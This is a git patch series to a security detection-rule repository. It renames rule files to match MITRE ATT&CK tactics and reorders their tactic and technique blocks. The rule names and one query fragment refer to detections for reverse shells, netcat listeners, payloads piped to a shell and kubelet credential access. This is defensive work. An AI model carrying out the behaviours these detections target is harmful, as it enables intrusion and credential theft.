rules/linux/persistence_ld_preload_shared_object_modif.toml diff --git a/rules/linux/defense_evasion_ld_so_creation.toml b/rules/linux/persistence_ld_so_creation.toml similarity index 100% rename from rules/linux/defense_evasion_ld_so_creation.toml rename to rules/linux/persistence_ld_so_creation.toml diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/persistence_linux_suspicious_symbolic_link.toml similarity index 100% rename from rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml rename to rules/linux/persistence_linux_suspicious_symbolic_link.toml diff --git a/rules/linux/privilege_escalation_sudo_hijacking.toml b/rules/linux/persistence_sudo_hijacking.toml similarity index 100% rename from rules/linux/privilege_escalation_sudo_hijacking.toml rename to rules/linux/persistence_sudo_hijacking.toml diff --git a/rules/linux/privilege_escalation_suspicious_passwd_file_write.toml b/rules/linux/persistence_suspicious_passwd_file_write.toml similarity index 100% rename from rules/linux/privilege_escalation_suspicious_passwd_file_write.toml rename to rules/linux/persistence_suspicious_passwd_file_write.toml diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/privilege_escalation_process_capability_set_via_setcap.toml similarity index 100% rename from rules/linux/persistence_process_capability_set_via_setcap.toml rename to rules/linux/privilege_escalation_process_capability_set_via_setcap.toml diff --git a/rules/linux/persistence_setuid_setgid_capability_set.toml b/rules/linux/privilege_escalation_setuid_setgid_capability_set.toml similarity index 100% rename from rules/linux/persistence_setuid_setgid_capability_set.toml rename to rules/linux/privilege_escalation_setuid_setgid_capability_set.toml diff --git a/rules/linux/execution_unusual_pkexec_execution.toml b/rules/linux/privilege_escalation_unusual_pkexec_execution.toml similarity index 100% rename from rules/linux/execution_unusual_pkexec_execution.toml rename to rules/linux/privilege_escalation_unusual_pkexec_execution.toml From bf5b1587abb6a9a6cfbb72625c6532bbc08dbe5e Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud Date: Tue, 24 Mar 2026 10:41:14 +0100 Subject: [PATCH 05/16] ++ --- ...ntrol_register_github_actions_runner.toml} | 0 ...and_control_revershell_via_shell_cmd.toml} | 0 ...s_followed_by_kubernetes_api_request.toml} | 0 ...r_tracking_id_tampering_via_env_vars.toml} | 0 ...netes_api_request_by_usual_utilities.toml} | 0 ...t_interactive_kubernetes_api_request.toml} | 0 ...es_api_activity_by_unusual_utilities.toml} | 0 ...ccess_execution_susp_react_serv_child.toml | 24 ++++++------- ...server_local_file_inclusion_activity.toml} | 24 ++++++------- ...erver_remote_file_inclusion_activity.toml} | 0 ...rsistence_sap_netweaver_jsp_webshell.toml} | 0 ...eb_server_potential_command_injection.toml | 24 ++++++------- ...lege_escalation_echo_nopasswd_sudoers.toml | 13 ++++--- ...ation_setuid_setgid_bit_set_via_chmod.toml | 12 +++---- ...files_compression_inside_a_container.toml} | 0 ...creation_execution_deletion_sequence.toml} | 0 ..._creation_in_system_binary_locations.toml} | 0 ...tener_established_inside_a_container.toml} | 0 ...ayload_downloaded_and_piped_to_shell.toml} | 0 ...cess_kubelet_certificate_file_access.toml} | 0 ...cutable_via_chmod_inside_a_container.toml} | 0 ...t_interactive_kubernetes_api_request.toml} | 0 .../execution_kubeletctl_execution.toml | 24 ++++++------- ..._suspicious_echo_or_printf_execution.toml} | 36 +++++++++---------- ...us_webserver_child_process_execution.toml} | 0 ...rect_kubelet_access_via_process_args.toml} | 24 ++++++------- 26 files changed, 90 insertions(+), 91 deletions(-) rename rules/cross-platform/{execution_register_github_actions_runner.toml => command_and_control_register_github_actions_runner.toml} (100%) rename rules/cross-platform/{execution_revershell_via_shell_cmd.toml => command_and_control_revershell_via_shell_cmd.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml => credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml} (100%) rename rules/cross-platform/{execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml => defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml => discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml => discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml} (100%) rename rules/cross-platform/{execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml => discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml} (100%) rename rules/cross-platform/{discovery_web_server_local_file_inclusion_activity.toml => initial_access_web_server_local_file_inclusion_activity.toml} (100%) rename rules/cross-platform/{discovery_web_server_remote_file_inclusion_activity.toml => initial_access_web_server_remote_file_inclusion_activity.toml} (100%) rename rules/cross-platform/{execution_sap_netweaver_jsp_webshell.toml => persistence_sap_netweaver_jsp_webshell.toml} (100%) rename rules/integrations/cloud_defend/{credential_access_collection_sensitive_files_compression_inside_a_container.toml => collection_collection_sensitive_files_compression_inside_a_container.toml} (100%) rename rules/integrations/cloud_defend/{defense_evasion_file_creation_execution_deletion_cradle.toml => command_and_control_file_creation_execution_deletion_sequence.toml} (100%) rename rules/integrations/cloud_defend/{execution_interactive_file_creation_in_system_binary_locations.toml => command_and_control_interactive_file_creation_in_system_binary_locations.toml} (100%) rename rules/integrations/cloud_defend/{execution_netcat_listener_established_inside_a_container.toml => command_and_control_netcat_listener_established_inside_a_container.toml} (100%) rename rules/integrations/cloud_defend/{execution_payload_downloaded_and_piped_to_shell.toml => command_and_control_payload_downloaded_and_piped_to_shell.toml} (100%) rename rules/integrations/cloud_defend/{discovery_kubelet_certificate_file_access.toml => credential_access_kubelet_certificate_file_access.toml} (100%) rename rules/integrations/cloud_defend/{execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml => defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml} (100%) rename rules/integrations/cloud_defend/{execution_direct_interactive_kubernetes_api_request.toml => discovery_direct_interactive_kubernetes_api_request.toml} (100%) rename rules/integrations/cloud_defend/{persistence_suspicious_echo_or_printf_execution.toml => execution_suspicious_echo_or_printf_execution.toml} (100%) rename rules/integrations/cloud_defend/{persistence_suspicious_webserver_child_process_execution.toml => execution_suspicious_webserver_child_process_execution.toml} (100%) rename rules/integrations/cloud_defend/{execution_potential_direct_kubelet_access_via_process_args.toml => lateral_movement_potential_direct_kubelet_access_via_process_args.toml} (100%) diff --git a/rules/cross-platform/execution_register_github_actions_runner.toml b/rules/cross-platform/command_and_control_register_github_actions_runner.toml similarity index 100% rename from rules/cross-platform/execution_register_github_actions_runner.toml rename to rules/cross-platform/command_and_control_register_github_actions_runner.toml diff --git a/rules/cross-platform/execution_revershell_via_shell_cmd.toml b/rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml similarity index 100% rename from rules/cross-platform/execution_revershell_via_shell_cmd.toml rename to rules/cross-platform/command_and_control_revershell_via_shell_cmd.toml diff --git a/rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml b/rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml similarity index 100% rename from rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml rename to rules/cross-platform/credential_access_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml diff --git a/rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml b/rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml similarity index 100% rename from rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml rename to rules/cross-platform/defense_evasion_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml diff --git a/rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml similarity index 100% rename from rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml rename to rules/cross-platform/discovery_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml diff --git a/rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml b/rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml similarity index 100% rename from rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml rename to rules/cross-platform/discovery_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml diff --git a/rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml b/rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml similarity index 100% rename from rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml rename to rules/cross-platform/discovery_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml diff --git a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml index 4ec8cccbe6a..a4661528dc3 100644 --- a/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml +++ b/rules/cross-platform/initial_access_execution_susp_react_serv_child.toml @@ -107,24 +107,24 @@ and ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml similarity index 100% rename from rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml rename to rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml index 62546661360..2cca4c558fb 100644 --- a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml +++ b/rules/cross-platform/initial_access_web_server_local_file_inclusion_activity.toml @@ -154,24 +154,24 @@ from framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1005" -name = "Data from Local System" -reference = "https://attack.mitre.org/techniques/T1005/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml similarity index 100% rename from rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml rename to rules/cross-platform/initial_access_web_server_remote_file_inclusion_activity.toml diff --git a/rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml b/rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml similarity index 100% rename from rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml rename to rules/cross-platform/persistence_sap_netweaver_jsp_webshell.toml diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml index 144a469096a..d85ff3962b0 100644 --- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml +++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml @@ -144,24 +144,24 @@ from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, log framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml index ed89b2cff74..34ef2593638 100644 --- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml +++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml @@ -61,7 +61,6 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if the threat has spread to other systems. - Implement additional logging and alerting for changes to the sudoers file and other critical configuration files to enhance detection of similar threats in the future.""" - [[rule.threat]] framework = "MITRE ATT&CK" @@ -76,9 +75,9 @@ name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -94,6 +93,6 @@ name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml index 86ff78db35a..967af209153 100644 --- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml +++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml @@ -92,9 +92,9 @@ name = "Setuid and Setgid" reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -110,6 +110,6 @@ name = "Setuid and Setgid" reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml b/rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml similarity index 100% rename from rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml rename to rules/integrations/cloud_defend/collection_collection_sensitive_files_compression_inside_a_container.toml diff --git a/rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml b/rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml similarity index 100% rename from rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml rename to rules/integrations/cloud_defend/command_and_control_file_creation_execution_deletion_sequence.toml diff --git a/rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml b/rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml similarity index 100% rename from rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml rename to rules/integrations/cloud_defend/command_and_control_interactive_file_creation_in_system_binary_locations.toml diff --git a/rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml b/rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml similarity index 100% rename from rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml rename to rules/integrations/cloud_defend/command_and_control_netcat_listener_established_inside_a_container.toml diff --git a/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml b/rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml similarity index 100% rename from rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml rename to rules/integrations/cloud_defend/command_and_control_payload_downloaded_and_piped_to_shell.toml diff --git a/rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml b/rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml similarity index 100% rename from rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml rename to rules/integrations/cloud_defend/credential_access_kubelet_certificate_file_access.toml diff --git a/rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml b/rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml similarity index 100% rename from rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml rename to rules/integrations/cloud_defend/defense_evasion_suspicious_file_made_executable_via_chmod_inside_a_container.toml diff --git a/rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml b/rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml similarity index 100% rename from rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml rename to rules/integrations/cloud_defend/discovery_direct_interactive_kubernetes_api_request.toml diff --git a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml index 9ecd8a31745..34f7b454378 100644 --- a/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml +++ b/rules/integrations/cloud_defend/execution_kubeletctl_execution.toml @@ -88,24 +88,24 @@ process.interactive == true and container.id like "?*" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1609" +name = "Container Administration Command" +reference = "https://attack.mitre.org/techniques/T1609/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1609" -name = "Container Administration Command" -reference = "https://attack.mitre.org/techniques/T1609/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml similarity index 100% rename from rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml rename to rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml index 379f019ead4..c6a0847d380 100644 --- a/rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml +++ b/rules/integrations/cloud_defend/execution_suspicious_echo_or_printf_execution.toml @@ -76,6 +76,24 @@ process.args like ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1095" name = "Non-Application Layer Protocol" @@ -102,24 +120,6 @@ reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" diff --git a/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml b/rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml similarity index 100% rename from rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml rename to rules/integrations/cloud_defend/execution_suspicious_webserver_child_process_execution.toml diff --git a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml b/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml similarity index 100% rename from rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml rename to rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml index fb7dbc5c834..291fd00fe82 100644 --- a/rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml +++ b/rules/integrations/cloud_defend/lateral_movement_potential_direct_kubelet_access_via_process_args.toml @@ -71,24 +71,24 @@ process.args like "http*:10250*" and process.interactive == true and container.i framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" From e83ddf130daef6fcdece2764d684cca21338d534 Mon Sep 17 00:00:00 2001 From: Ruben Groenewoud Date: Tue, 24 Mar 2026 10:49:41 +0100 Subject: [PATCH 06/16] ++ --- ...k_alert.toml => collection_azure_o365_with_network_alert.toml} | 0 ...lection_genai_process_encoding_prior_to_network_activity.toml} | 0 ...l => defense_evasion_virtual_machine_fingerprinting_grep.toml} | 0 ...=> initial_access_web_server_potential_command_injection.toml} | 0 ...dification.toml => persistence_genai_config_modification.toml} | 0 ...lation_trap_execution.toml => persistence_trap_execution.toml} | 0 ...resource_development_genai_process_compiling_executables.toml} | 0 ...al_user.toml => collection_dynamodb_scan_by_unusual_user.toml} | 0 ...stance_restored.toml => collection_rds_instance_restored.toml} | 0 ...s_snapshot_export.toml => collection_rds_snapshot_export.toml} | 0 ...defense_evasion_aws_eventbridge_rule_disabled_or_deleted.toml} | 0 ...eated.toml => defense_evasion_cloudtrail_logging_created.toml} | 0 ...dated.toml => defense_evasion_cloudtrail_logging_updated.toml} | 0 ...on.toml => defense_evasion_cloudwatch_log_group_deletion.toml} | 0 ...n.toml => defense_evasion_cloudwatch_log_stream_deletion.toml} | 0 ...ption.toml => defense_evasion_ec2_disable_ebs_encryption.toml} | 0 ...reation.toml => defense_evasion_ec2_network_acl_creation.toml} | 0 ...l => defense_evasion_ec2_route_table_modified_or_deleted.toml} | 0 ...vasion_ec2_security_group_configuration_change_detection.toml} | 0 ... => defense_evasion_iam_api_calls_via_user_session_token.toml} | 0 ...device.toml => defense_evasion_iam_deactivate_mfa_device.toml} | 0 ...pdated.toml => defense_evasion_iam_saml_provider_updated.toml} | 0 ...vasion_lambda_backdoor_invoke_function_for_any_principal.toml} | 0 ... defense_evasion_lambda_external_layer_added_to_function.toml} | 0 ...vasion_rds_instance_cluster_deletion_protection_disabled.toml} | 0 ..._public.toml => defense_evasion_rds_instance_made_public.toml} | 0 ...> defense_evasion_route_53_domain_transfer_lock_disabled.toml} | 0 ...fense_evasion_route_53_hosted_zone_associated_with_a_vpc.toml} | 0 ...able_created.toml => defense_evasion_route_table_created.toml} | 0 ...defense_evasion_s3_bucket_policy_added_for_public_access.toml} | 0 ...ml => discovery_aws_s3_bucket_enumeration_or_brute_force.toml} | 0 ...ml => discovery_ec2_full_network_packet_capture_detected.toml} | 0 ...l => exfiltration_sns_topic_message_publish_by_rare_user.toml} | 0 ...dded.toml => impact_s3_bucket_lifecycle_expiration_added.toml} | 0 ..._rare_user.toml => impact_sns_topic_created_by_rare_user.toml} | 0 ...e_evasion_sqs_purge_queue.toml => impact_sqs_purge_queue.toml} | 0 ..._login.toml => initial_access_ec2_instance_console_login.toml} | 0 ...persistence_ec2_instance_connect_ssh_public_key_uploaded.toml} | 0 ...istence_iam_administratoraccess_policy_attached_to_group.toml} | 0 ...sistence_iam_administratoraccess_policy_attached_to_role.toml} | 0 ...sistence_iam_administratoraccess_policy_attached_to_user.toml} | 0 ...persistence_iam_customer_managed_policy_attached_to_role.toml} | 0 ...policy.toml => persistence_iam_update_assume_role_policy.toml} | 0 ..._to_group.toml => persistence_iam_user_addition_to_group.toml} | 0 ...tence_s3_bucket_policy_added_for_external_account_access.toml} | 0 ...ation_token.toml => persistence_sts_get_federation_token.toml} | 0 ..._sts_role_chaining.toml => persistence_sts_role_chaining.toml} | 0 ...d.toml => privilege_escalation_iam_oidc_provider_created.toml} | 0 ...velopment_route_53_domain_transferred_to_another_account.toml} | 0 ... collection_azure_storage_blob_download_azcopy_sas_token.toml} | 0 ...trieval.toml => collection_key_vault_excessive_retrieval.toml} | 0 ...ccess_azure_arc_cluster_credential_access_unusual_source.toml} | 0 ...ntra_id_illicit_consent_grant_via_registered_application.toml} | 0 ...entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml} | 0 ..._id_oauth_phishing_via_first_party_microsoft_application.toml} | 0 ...dential_access_entra_id_protection_sign_in_risk_detected.toml} | 0 ...ss_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml} | 0 ...tial_access_entra_id_teamfiltration_user_agents_detected.toml} | 0 ...eated.toml => defense_evasion_automation_account_created.toml} | 0 ...se_evasion_entra_id_actor_token_user_impersonation_abuse.toml} | 0 ...ense_evasion_entra_id_conditional_access_policy_modified.toml} | 0 ...nse_evasion_entra_id_device_code_auth_with_broker_client.toml} | 0 ...fense_evasion_entra_id_federated_login_by_unusual_client.toml} | 0 ...on_entra_id_graph_single_session_from_multiple_addresses.toml} | 0 ...r.toml => defense_evasion_entra_id_mfa_disabled_for_user.toml} | 0 ...on_entra_id_privileged_identity_management_role_modified.toml} | 0 ... defense_evasion_entra_id_rare_app_id_for_principal_auth.toml} | 0 ...evasion_entra_id_tenant_domain_federation_via_audit_logs.toml} | 0 ...ml => defense_evasion_graph_eam_addition_or_modification.toml} | 0 ...defense_evasion_graph_first_occurrence_of_client_request.toml} | 0 ...fense_evasion_storage_blob_container_access_modification.toml} | 0 ...itial_access_entra_id_user_signed_in_from_unusual_device.toml} | 0 ...l => persistence_azure_rbac_administrator_roles_assigned.toml} | 0 ...ersistence_entra_id_elevate_to_user_administrator_access.toml} | 0 ....toml => persistence_entra_id_external_guest_user_invite.toml} | 0 ...d.toml => persistence_kubernetes_aks_rolebinding_created.toml} | 0 ...ated.toml => persistence_storage_account_key_regenerated.toml} | 0 ...ml => command_and_control_ml_high_bytes_destination_port.toml} | 0 ...on.toml => defense_evasion_gcp_logging_sink_modification.toml} | 0 ...tion.toml => impact_gcp_iam_service_account_key_deletion.toml} | 0 ...eletion.toml => impact_gcp_pub_sub_subscription_deletion.toml} | 0 ...topic_deletion.toml => impact_gcp_pub_sub_topic_deletion.toml} | 0 ...toml => impact_gcp_virtual_private_cloud_network_deleted.toml} | 0 ...reation.toml => persistence_gcp_iam_custom_role_creation.toml} | 0 ...l => persistence_gcp_storage_bucket_permissions_modified.toml} | 0 ...> collection_github_high_number_of_cloned_repos_from_pat.toml} | 0 ...=> collection_github_repository_activity_from_unusual_ip.toml} | 0 